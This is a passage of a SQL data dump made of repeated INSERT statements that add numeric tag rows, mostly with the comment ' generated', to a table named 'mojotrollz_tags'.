`comment`) VALUES (5663, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5672, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5673, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5674, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5675, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5676, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5677, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5679, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5680, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5713, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5721, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5722, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5723, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5724, 4, 1, 389, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5724, 4, 2, 2437, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5725, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5726, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5727, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5728, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5729, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5730, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5741, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5742, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5761, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5762, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5763, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5781, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5801, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5802, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5803, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5804, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5821, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5845, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5846, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5848, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5861, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5862, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5863, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5881, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5882, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5883, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5884, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5885, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5886, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5887, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5888, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5889, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5890, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5891, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5892, 4, 1, 30, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5892, 4, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5893, 4, 1, 30, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5893, 4, 2, 2597, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5901, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5902, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5903, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5904, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5921, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5922, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5923, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5924, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5925, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5926, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5927, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5928, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5929, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5930, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5931, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5932, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5941, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5942, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5943, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5944, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5961, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (5981, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6001, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6002, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6004, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6021, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6022, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6023, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6025, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6026, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6027, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6028, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6029, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6030, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6031, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6032, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6041, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6042, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6061, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6062, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6063, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6064, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6065, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6066, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6067, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6068, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6069, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6070, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6071, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6072, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6073, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6074, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6075, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6076, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6081, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6082, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6083, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6084, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6085, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6086, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6087, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6088, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6089, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6101, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6102, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6103, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6121, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6122, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6123, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6124, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6125, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6126, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6127, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6128, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6129, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6130, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6132, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6133, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6134, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6135, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6136, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6141, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6142, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6143, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6144, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6145, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6146, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6147, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6148, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6162, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6163, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6164, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6181, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6182, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6183, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6184, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6185, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6186, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6187, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6261, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6281, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6282, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6283, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6285, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6301, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6321, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6322, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6323, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6324, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6341, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6342, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6343, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6344, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6361, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6362, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6363, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6364, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6365, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6381, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6382, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6383, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6384, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6385, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6386, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6387, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6388, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6391, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6392, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6393, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6394, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6395, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6401, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6402, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6421, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6441, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6442, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6461, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6462, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6481, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6482, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6501, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6502, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6503, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6504, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6521, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6523, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6541, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6542, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6543, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6544, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6545, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6546, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6547, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6548, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6561, 4, 1, 48, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6561, 4, 2, 719, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6562, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6563, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6565, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6566, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6567, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6568, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6569, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6570, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6571, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6581, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6582, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6583, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6584, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6585, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6601, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6602, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6603, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6604, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6605, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6606, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6607, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6608, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6609, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6610, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6611, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6612, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6621, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6622, 4, 1, 0, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (6623, 4, 1, 1, ' generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES 